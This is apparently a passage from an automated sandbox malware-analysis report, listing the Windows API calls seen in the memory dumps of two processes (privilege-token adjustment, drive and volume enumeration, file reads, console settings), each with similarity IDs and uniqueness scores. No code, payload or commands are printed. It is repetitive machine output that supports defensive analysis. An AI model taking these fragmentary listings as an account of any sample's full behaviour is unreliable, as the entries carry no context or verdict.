                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01B9BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01B9A39C
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01B9AA71
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01B9AB1A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01B9ABC9
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01B9BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01B9A23E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01B9A94A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01B9ABC9
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01B9A39C
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01B9AA71
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01B9A9C8
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01B9A9C8
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124080788.0000000002780000.00000040.00000040.sdmp, Offset: 02780000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124080788.0000000002780000.00000040.00000040.sdmp, Offset: 02780000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119348986.0000000001B92000.00000040.00000001.sdmp, Offset: 01B92000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119348986.0000000001B92000.00000040.00000001.sdmp, Offset: 01B92000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CAAD37
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CAAD37
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CAB329
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CAB329
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028901D0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0289072D
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02890DD6
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 01CABDBC
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 01CAAFBE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0289109E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 01CAB0AE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01CAA23E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 02890819
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02890502
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0289072D
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 028908E5
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CAA94A
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02890DD6
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 01CABDBC
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 01CAB0AE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02890FB0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CAAB1A
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02891148
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 01CAAFBE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CABA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 028908E5
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01CAA39C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0289132F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02890640
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CAAB1A
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01CAAA71
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0289099C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,93CF84E6,00000000,00000000,00000000,00000000), ref: 02890819
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01CAABC9
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CABA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01CAA23E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028901D0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0289109E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
